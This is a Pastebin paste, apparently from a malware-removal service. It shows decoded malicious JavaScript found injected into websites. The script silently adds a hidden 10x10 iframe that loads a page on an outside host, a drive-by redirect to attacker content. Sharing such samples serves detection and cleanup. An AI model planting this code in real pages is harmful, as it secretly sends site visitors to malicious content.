Advertisement
scurit

iFrame injection (after base64 decode)

Aug 22nd, 2012
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. got this on your site? Let us help remove it: http://www.malwareremovalservice.com
  2.  
  3. if (document.getElementsByTagName('body')[0]){
  4.   iframer();
  5. }
  6. else {
  7.   document.write("
  8. <iframe src='http://dskigtbah.kwik.to/vc.php?go=2' width='10' height='10' style='visibilit
  9. y:hidden;position:absolute;left:0;top:0;'></iframe>");
  10. }
  11. function iframer(){
  12.   var f = document.createElement('iframe');
  13.   f.setAttribute('src', 'http://dskigtbah.kwik.to/vc.php?go=2');
  14.   f.style.visibility = 'hidden';
  15.   f.style.position = 'absolute';
  16.   f.style.left = '0';
  17.   f.style.top = '0';
  18.   f.setAttribute('width', '10');
  19.   f.setAttribute('height', '10');
  20.   document.getElementsByTagName('body')[0].appendChild(f);
  21. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement